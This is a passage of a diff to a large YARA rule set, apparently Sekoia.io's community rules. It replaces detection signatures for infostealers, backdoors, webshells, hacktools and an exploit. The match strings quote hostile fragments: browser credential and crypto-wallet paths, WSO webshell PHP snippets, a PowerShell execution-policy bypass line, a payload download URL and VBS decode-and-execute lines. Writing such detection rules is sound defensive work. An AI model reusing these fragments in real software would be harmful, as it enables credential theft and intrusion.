+		$g2 = "dep    golang.org"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		3 of ( $s* ) and any of ( $g* )
 }
-rule SEKOIA_Implant_Win_Pingpull : FILE
+rule SEKOIA_Infostealer_Win_44Caliber : FILE
 {
 	meta:
-		description = "Detect the PingPull malware used by GALLUM in 2022"
+		description = "Finds samples of the 44Caliber stealer"
 		author = "Sekoia.io"
-		id = "521615d4-912b-4581-b5a9-a8b158ac9496"
-		date = "2022-06-13"
+		id = "44e5bbc1-f442-47d3-8431-25182f38439d"
+		date = "2022-03-08"
 		modified = "2024-12-19"
-		reference = "https://unit42.paloaltonetworks.com/pingpull-gallium/#Protections-and-Mitigations"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_pingpull.yar#L1-L16"
+		reference = "https://github.com/razexgod/44CALIBER"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_44caliber.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "778d429e4c6d7575ddeea5144f9554f2b6ca46175d4202d338bef01dc9668b97"
+		logic_hash = "4b80d6b2116f53926897aa79a7c232413974caefaf524f50e6a7cede11f3aaa0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250199,54 +250176,65 @@ rule SEKOIA_Implant_Win_Pingpull : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "PROJECT_%s_%s_%08X"
+		$str0 = "44 CALIBER" fullword ascii
+		$str1 = "https://api.vimeworld.ru/user/name/" wide
+		$str2 = "https://freegeoip.app/xml/" wide
+		$str3 = "SOFTWARE\\Wow6432Node\\Valve\\Steam" wide
+		$str4 = "VPN\\NordVPN\\\\accounts.txt" wide
+		$str5 = "OpenVPN Connect\\profiles" wide
+		$str6 = "FuckTheSystem Copyright" wide
+		$str7 = "lolz.guru" wide
+		$str8 = "xss.is" wide
+		$str9 = "Test message recieved successfully! :raised_hands:" wide
+		$str10 = "Specify a single character: either D or F" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 9 of ( $str* ) and filesize > 100KB and filesize < 1MB
 }
-rule SEKOIA_Tool_Pivotnacci
+rule SEKOIA_Storm_1811_Screenconnect_Update
 {
 	meta:
-		description = "Detects Pivotnacci"
+		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
 		author = "Sekoia.io"
-		id = "31ecb08a-fc92-4cbe-a865-7ce869a5fa6a"
-		date = "2024-04-22"
+		id = "252ef24a-14dc-41e8-ba91-dcb9b6deb428"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_pivotnacci.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/storm_1811_screenconnect_update.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b0e4bc997775fb5ff258a23e07a58b4897a2ce9d3fffab86e93919857e566d18"
+		logic_hash = "ad61e28566375fd3c029df79e1b608aac921ab8121a43bd01314c9112197c32e"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pivotnacci = "pivotnacci"
-		$s1 = "Socks server => %s:%s"
-		$s2 = "The default listening address"
-		$s3 = "Socks server for HTTP agents"
-		$s4 = "Message returned by the agent web page"
-		$s5 = "Password to communicate with the agent"
-		$s6 = "To specify agent type in case is not automatically detected."
+		$s1 = "upd100.appspot.com/update/u.zip" ascii fullword
+		$s2 = "Unzip ok" ascii fullword
+		$s3 = "Installing update" ascii fullword
+		$s4 = "Administrators" ascii fullword
+		$s5 = "I am not admin" ascii fullword
+		$s6 = "I am admin" ascii fullword
+		$s7 = "ScreenConnect.ClientSetup.exe" ascii fullword
+		$s8 = "for %%x in (%IPS%) do (" ascii fullword
 
 	condition:
-		$pivotnacci and 3 of ( $s* )
+		6 of them
 }
-rule SEKOIA_Infostealer_Win_Xenostealer_Strings : FILE
+rule SEKOIA_Emmenhtal_Strings_Hta_Exe : FILE
 {
 	meta:
-		description = "Finds XenoStealer standalone samples based on the strings"
+		description = "Emmenhtal Loader string"
 		author = "Sekoia.io"
-		id = "0a41788b-1fa7-44ff-af85-9c1ff1892aad"
-		date = "2024-10-30"
+		id = "64e08610-e8a4-4edd-8f6b-d4e8d2b47d87"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://github.com/moom825/XenoStealer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_xenostealer_strings.yar#L1-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/emmenhtal_strings_hta_exe.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "b74733d68e95220ab0630a68ddf973b0c959fd421628e639c1b91e465ba9299b"
-		logic_hash = "1c48b15b8e9648c1c4d2f9c0a9ee3f4c48605fa44772b87a03ad81923e5adf15"
+		hash = "e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912"
+		logic_hash = "93f85a4ccb58c6aeb664c4c843ff80a4ab7b4308a944537f7ebe087515a61659"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250254,77 +250242,72 @@ rule SEKOIA_Infostealer_Win_Xenostealer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "XenoStealer" ascii wide
-		$str02 = "$d05de59c-9ee5-4e7e-abb5-8f2cc3f72cd1" ascii
-		$str03 = "SteamInfo" ascii
-		$str04 = "TelegramInfo" ascii
-		$str05 = "NgrokInfo" ascii
-		$str06 = "pAuthInfo" ascii
-		$str07 = "FoxMailInfo" ascii
-		$str08 = "_hasNitro" ascii
-		$str09 = "_games" ascii
-		$str10 = "_profiles" ascii
-		$str11 = "_cookies" ascii
-		$str12 = "_creditCards" ascii
-		$str13 = "_cryptoExtensions" ascii
-		$str14 = "_passwordManagerExtensions" ascii
-		$str15 = "ChromiumBrowsersLikelyLocations" ascii
-		$str16 = "EdgeCryptoExtensions" ascii
-		$str17 = "ChromePasswordManagerExtensions" ascii
-		$str18 = "GeckoBrowserOptions" ascii
-		$str19 = "get_programFiles" ascii
+		$char = / = String\.fromCharCode\([a-zA-Z]{2,4},[a-zA-Z]{2,4},/
+		$var = "var "
+		$eval = "eval("
+		$script1 = "<script>"
+		$script2 = "</script>MZ"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 15 of them
+		uint16be( 0 ) == 0x4d5a and all of them and $var in ( @script1 .. @script1 + 2000 ) and $char in ( @var .. @var + 100 )
 }
-rule SEKOIA_Apt_Kimsuky_Klogexe : FILE
+rule SEKOIA_Infostealer_Win_Lighting : FILE
 {
 	meta:
-		description = "Detects KLogExe, a keylogger used by Kimsuky"
+		description = "Detect the Lighting infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "f6e3b1a5-43b6-4dac-83c2-a365c41de38d"
-		date = "2024-09-27"
+		id = "3c160c16-f417-4fa2-aa44-fb7b981fb2b3"
+		date = "2022-04-07"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_klogexe.yar#L1-L32"
+		reference = "https://blog.cyble.com/2022/04/05/inside-lightning-stealer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_lighting.yar#L1-L40"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "e1d683ee1746c08c5fff1c4c2b3b02f0"
-		hash = "90946c6358eacd119fe1eb36ec7a0a18"
-		hash = "9760f489a390665b5e7854429b550c83"
-		logic_hash = "4b616908ceacd85c5d8b527cd1a718082c709071dc1fa9c9ccc96e71dc4e7449"
+		logic_hash = "1c1d39ce886a433a352c55bf436b959ef528ad7ce38027243ed5b5f1ac79822f"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$event = "Norton_BreakHelper" ascii wide
-		$log = "------ %d/%d/%d : %d/%d ------" ascii wide
-		$keylog_1 = "[RM+]"
-		$keylog_2 = "[Tab+]"
-		$keylog_3 = "[Home+]"
-		$keylog_4 = "[End+]"
-		$keylog_5 = "[clip_s]: %s "
-		$keylog_6 = "%s[Too many clip_tail]"
-		$keylog_7 = "%s[F%d]"
-		$user_agent = "Chrome/31.0." wide
+		$str0 = "\\logins.json" wide
+		$str1 = "key3.db" wide
+		$str2 = "\\key4.db" wide
+		$str3 = "cert9.db" wide
+		$str4 = "\\places.sqlite" wide
+		$str5 = "7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9" ascii
+		$str6 = "potentiallyVulnerablePasswords" wide
+		$dll0 = "\\mozglue.dll" wide
+		$dll1 = "\\nss3.dll" wide
+		$dll2 = "SbieDll.dll" wide
+		$app00 = "\\discord\\Local Storage\\leveldb\\" wide
+		$app01 = "Software\\Valve\\Steam" wide
+		$app02 = "Telegram Desktop\\tdata" wide
+		$app03 = "\\Wallets\\Armory\\" wide
+		$app04 = "\\Wallets\\Atomic\\Local Storage\\leveldb\\" wide
+		$app05 = "\\Exodus\\exodus.wallet\\" wide
+		$app06 = "\\Wallets\\Zcash\\" wide
+		$app07 = "uCozMedia\\Uran" wide
+		$app08 = "Comodo\\IceDragon" wide
+		$app09 = "8pecxstudios\\Cyberfox" wide
+		$app10 = "NETGATE Technologies\\BlackHaw" wide
+		$app11 = "Moonchild Productions\\Pale Moon" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 600KB and 8 of them
+		uint16( 0 ) == 0x5A4D and 6 of ( $str* ) and all of ( $dll* ) and 10 of ( $app* )
 }
-rule SEKOIA_Apt_Mustangpanda_Xoreddll : FILE
+rule SEKOIA_Hacktool_Rubeus_Strings : FILE
 {
 	meta:
-		description = "Detects xored DLL from MustangPanda embedding a document"
+		description = "Detects Rubeus based on strings"
 		author = "Sekoia.io"
-		id = "73d13624-01df-41ab-b449-86db43dc6c55"
-		date = "2022-07-19"
+		id = "048cab99-c288-44c2-9dc6-74eed02ef8f5"
+		date = "2022-02-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_xoreddll.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_rubeus_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "685be191cf187c0d5bfd00354400c47a961c9d047aa7e65e4cfc2201ec5eb1bc"
+		logic_hash = "606c1b3c29dd4b609eba64bc5d02a81859bb574ee10bce8b0f355ac01d99689f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250332,28 +250315,27 @@ rule SEKOIA_Apt_Mustangpanda_Xoreddll : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$clear = "This program cannot be run in DOS mode"
-		$stub = "This program cannot be run in DOS mode" xor
-		$res1 = "5w>w9wR'31Z" xor
-		$res2 = "r0y0~0KlBD" xor
-		$res3 = "d&o&h&öé7Æ" xor
-		$res4 = "9{2{5{+0" xor
+		$ = "includeComputerAccounts" ascii
+		$ = "passwordsOutfile" ascii
+		$ = "monitorIntervalSeconds" ascii
+		$ = "displayNewTickets" ascii
+		$ = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii
 
 	condition:
-		$stub and any of ( $res* ) and not $clear and filesize < 3MB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_4 : FILE
+rule SEKOIA_Apt_Boldmove_Strings : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects BOLDMOVE via strings"
 		author = "Sekoia.io"
-		id = "b8327436-3f3d-441c-86b7-35cd30144dc2"
-		date = "2023-02-03"
+		id = "0458e282-f92f-4600-964a-de6b66b4a82d"
+		date = "2023-01-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_4.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_boldmove_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ee67eb7b51ff6f3882c6b3ad86c3581396ba02f616c29a0190d0a2ad3d2ea614"
+		logic_hash = "71649451b88629da1779c0856b2f1f60f87501962c69556f7943b049688a2d96"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250361,151 +250343,159 @@ rule SEKOIA_Generic_Sharpshooter_Payload_4 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Function RC4(byteMessage, strKey)"
-		$ = "Set EL = DM.createElement("
-		$ = "decodeBase64 = EL.NodeTypedValue"
-		$ = "Execute plain"
+		$s1 = "cwd=%s" ascii wide
+		$s2 = "executable=%s" ascii wide
+		$s3 = "curl/6.12.34" ascii wide
+		$s4 = "www.example.com" ascii wide
+		$s5 = "GET /ws HTTP/1.1" ascii wide
 
 	condition:
-		all of them and filesize < 2MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and 4 of them
 }
-rule SEKOIA_Loader_Win_Operationmagalenha_Vbs
+rule SEKOIA_Apt_Unk_Batcopier_Strings : FILE
 {
 	meta:
-		description = "Finds VBS file loading the PeepingTitle backdoor"
+		description = "Detects BatCopier variant"
 		author = "Sekoia.io"
-		id = "b1f705d1-de3e-4ce6-9bb7-0e39b6e79add"
-		date = "2023-05-31"
+		id = "eb76bbd0-a722-4fec-a4a7-c48c70a1880b"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_operationmagalenha_vbs.yar#L1-L39"
+		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_batcopier_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bb1c48ea6a4d9f0bc04df558837f2d448b38eac920cb4030e01b915a4e442708"
+		logic_hash = "0007d6d00d5b8db048456bb566ef9ed4516c4e1b392cc73c40396785ba885f55"
 		score = 75
-		quality = 78
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "'Skip to content" ascii
-		$str02 = "'Search" ascii
-		$str03 = "'Sign in" ascii
-		$str04 = "'Sign up" ascii
-		$str05 = "'Code" ascii
-		$str06 = "'Terms" ascii
-		$str07 = "'Privacy" ascii
-		$str08 = "'Security" ascii
-		$str09 = "'Status" ascii
-		$str10 = "'Docs" ascii
-		$str11 = "'Contact GitHub" ascii
-		$str12 = "'Pricing" ascii
-		$str13 = "'API" ascii
-		$str14 = "'Training" ascii
-		$str15 = "'Blog" ascii
-		$str16 = "'About" ascii
-		$vbs01 = "WScript.Sleep" ascii nocase
-		$vbs02 = "Set obj" ascii nocase
-		$vbs03 = "Dim obj" ascii nocase
-		$vbs04 = "https://tinyurl.com" ascii nocase
-		$vbs05 = "C:\\Users\\Public" ascii nocase
-		$vbs06 = "CreateObject(\"WScript.Shell\")" ascii nocase
-		$vbs07 = ".SaveToFile" ascii nocase
+		$ = "@echo off"
+		$ = "echo F|xcopy"
+		$ = "attrib +r +s +h"
 
 	condition:
-		10 of ( $str* ) and 5 of ( $vbs* )
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Hacktool_Fscan_Strings : FILE
+rule SEKOIA_Webshell_Wso_Webshell_Strings
 {
 	meta:
-		description = "Detects fscan based on strings"
+		description = "Detects the WSO webshells"
 		author = "Sekoia.io"
-		id = "6bef80c3-370c-4168-9d88-3fac88f986b1"
-		date = "2023-12-06"
+		id = "84340792-73a4-4d61-9957-6cfa1f6444a7"
+		date = "2022-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_fscan_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/webshell_wso_webshell_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b1c88af2f90921fab4ac32ef65e226a652b8df2915abc62de0a28af9ad59811c"
+		logic_hash = "4d6966a34dc8e7390913857144da106affea14668d1c2c11a05be62a6e625c8f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Plugins.RdpScan.func1"
-		$ = "Plugins.smb1AnonymousConnectIPC.func1"
-		$ = "WebScan/WebScan.go"
-		$ = "Plugins/CVE-2020-0796.go"
-		$ = "Plugins.SshConn.func4"
-		$ = "Plugins.PostgresScan"
-		$ = "Plugins.(*FCGIClient).Request.func1"
+		$ = "decrypt($str,$pwd){$pwd=base64_encode($pwd);"
+		$ = "prototype(md5($_SERVER['HTTP_HOST'])"
+		$ = "$_COOKIE[md5($_SERVER['HTTP_HOST'])."
+		$ = "set(a,c,p1,p2,p3,charset)"
+		$ = "(($p & 0x0008) ? (($p & 0x0400)"
+		$ = "gcc','lcc','cc','ld','make','php"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 30MB and 4 of them
+		3 of them
 }
-
-rule SEKOIA_Implant_Win_Sliver_Dll : FILE
+rule SEKOIA_Exploit_Linux_Eop_Rationallove_Strings : FILE
 {
 	meta:
-		description = "Detect the Sliver DLL based on export names (standalone and process/memory dumps)"
+		description = "Detects RationalLove Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "41d83011-a08b-4245-b633-79fe6afaa4d2"
-		date = "2021-11-08"
+		id = "e71e026e-ca2c-42b7-b552-b3fd013676db"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_sliver_dll.yar#L3-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_rationallove_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "251a123fe70338d18c9bc9fb9e0b0d542f2b94203bee8537244e62fa102f371b"
+		logic_hash = "84a53a1d4f08e178a5cf1c968b3b98ae8624c3d052760517ec88bddd25833108"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		modification_date = "2021-12-22"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "main.RunSliver"
-		$a2 = "main.DllInstall"
+		$ = "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
+		$ = "Detected OS version: %s"
+		$ = "Content-Type: text/plain; charset=UTF-8"
 
 	condition:
-		( filesize > 8MB and filesize < 11MB and uint16be( 0 ) == 0x4d5a and pe.characteristics & pe.DLL and pe.exports ( "RunSliver" ) and pe.exports ( "DllInstall" ) and pe.exports ( "VoidFunc" ) ) or ( true and ( uint32be( 0 ) == 0x4d444d50 or uint32be( 0 ) == 0x00000000 ) and $a2 in ( @a1 .. @a1 + 100 ) )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-
-rule SEKOIA_Implant_Win_Mysterysnail : FILE
+rule SEKOIA_Backdoor_Win_Spacecolon : FILE
 {
 	meta:
-		description = "Detect the MysterySnail using section hashes"
+		description = "Finds Spacecolon samples based on specific strings (ScHackTool component)"
 		author = "Sekoia.io"
-		id = "dfd2eba8-eb9c-411a-b5e0-663593453e3d"
-		date = "2021-10-13"
+		id = "ae09f0e2-e913-44d5-abe1-715170368cc8"
+		date = "2023-08-25"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_mysterysnail.yar#L4-L27"
+		reference = "https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_spacecolon.yar#L1-L39"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "37c02a5916ad7ce3190ce926d576365d1e17fee0f10e9b31619ea4b6fee29ae6"
+		logic_hash = "1251df19c521e9ee9da307d56eea265265f2bee4a8e7eec099e4ebfb4e2bd7a2"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$str01 = "Before Work" ascii
+		$str02 = "DEFENDER OFF" ascii
+		$str03 = "Stop Service" ascii
+		$str04 = "Kill All (Default)" ascii
+		$str05 = "Keyboard EN" ascii
+		$str06 = "After Work" ascii
+		$str07 = "Del Shadow Log" ascii
+		$str08 = "Kill OSK" ascii
+		$str09 = "PWGEN" ascii
+		$str10 = "Character :" ascii
+		$str11 = "PW GEN" ascii
+		$str12 = "Cobian UI Pass" ascii
+		$str13 = "Credssp" ascii
+		$str14 = "Username :" ascii
+		$str15 = "Password :" ascii
+		$str16 = "TSpeedButton" ascii
+		$str17 = "Ab1q2w3e!" ascii
+		$str18 = "PC Details" ascii
+		$str19 = "Mimi Dump" ascii
+		$str20 = "MIMI Dump" ascii
+		$str21 = "powershell -ExecutionPolicy Bypass -File \"" wide
+		$str22 = "lastlog.txt" wide
+		$str23 = "$AdminGroupName = (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = \"S-1-5-32-544\"').Name" wide
+		$str24 = "net localgroup $AdminGroupName " wide
+
 	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "de0c9e6aec27d278ccdb6718b3e96e32" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a41b6fb1cc34d6393e30c13a58f6ecd4" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f263a2be76694feab7e2ce79ecf8b724" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e9056ae96619d7aa18daa973da592afc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3e38e89e9e8329f5cff8a7022d88fff7" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce78f8599167c63e8f1c8d3e789c4a60" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "456d4f1096bf5c72cd6e1e3eb9980ec6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "37e2bff637001fc64566fe651757f66e" ) or hash.md5 ( pe.rich_signature.clear_data ) == "e4116fffa240ba6d91b400541ce85182" )
+		uint16( 0 ) == 0x5a4d and 17 of them
 }
-rule SEKOIA_Apt_Turla_Comlook : FILE
+rule SEKOIA_Apt_Icepeony_Iceevent : FILE
 {
 	meta:
-		description = "Detects Class and Method names used inside ComLook"
+		description = "Detects IceEvent Backdoor"
 		author = "Sekoia.io"
-		id = "c3bf886b-f952-47f9-aff6-3cd74c27077d"
-		date = "2023-10-30"
+		id = "7d1f8b90-fde4-4d5c-a8a3-375db8aa88a1"
+		date = "2024-10-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_turla_comlook.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_icepeony_iceevent.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "882a2efda4c3888c34a2802797c9eac4ab8b96774f2eea19e586ff9c8adb9292"
+		hash = "07c291c9cea4430676c303128bbbb8e3"
+		hash = "489b573b37ab8bc74cca3704e723b895"
+		hash = "265f6cf778d26e62903fb295f89507e3"
+		hash = "f5eb28dd29c91cc84818b74d7f138ff6"
+		logic_hash = "8afe4a94513e9aa5d20849153c76cfe5c684c9a529710947930c76098a36540e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250513,36 +250503,27 @@ rule SEKOIA_Apt_Turla_Comlook : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ClassName1 = "AgentConfig"
-		$ClassName2 = "CommandPerforming"
-		$MethodName1 = "CmdCommand"
-		$MethodName2 = "GetConfigCommand"
-		$MethodName3 = "GetFileCommand"
-		$MethodName4 = "PutFileCommand"
-		$MethodName5 = "SetConfigCommand"
-		$MethodName6 = "AgentProtocol"
-		$Log1 = "CONFIG_SERVERS_LIST_PARSING_ERROR" ascii wide
-		$Log2 = "GET_UIDS_TO_CHECK_PARSING_ERROR" ascii wide
-		$Log3 = "PAYLOAD_PARSING_FILEPATH_AND_FILE_ERROR" ascii wide
-		$Log4 = "COMMAND_EMPTY_ERROR" ascii wide
-		$Log5 = "IMAP_USERNAME_FORMAT_INCORRECT" ascii wide
-		$Log6 = "NO_MESSAGES_TO_RETRIEVE" ascii wide
+		$ = "Created a process" ascii fullword
+		$ = "CreateProcess failed: %d"
+		$ = "bind error:"
+		$ = "Error creating pip: %d"
+		$ = "listen error:"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of ( $ClassName* ) and any of ( $MethodName* ) and any of ( $Log* )
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Infostealer_Win_Mars_Stealer_Variant_Llcppc1 : FILE
+rule SEKOIA_Apt_Badmagic_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detect Mars Stealer variand llcppc1"
+		description = "Detect LNK used by BadMagic to execute MSI payloads."
 		author = "Sekoia.io"
-		id = "3e2c7440b2fc9e4b039e6fa8152ac8fe"
-		date = "2022-03-10"
+		id = "731bd51d-c4e4-4efb-9fa8-f981a8555ed3"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_mars_stealer_variant_llcppc1.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_malicious_lnk.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f9d92338fa31c38648b72d7f9a953201c7e498237bc9d02d6247d1882d1e3432"
+		logic_hash = "b83749c71cefb485f8bbea1d465fc477de159e086efa04ebce4d0778a203ed89"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -250550,23 +250531,25 @@ rule SEKOIA_Infostealer_Win_Mars_Stealer_Variant_Llcppc1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
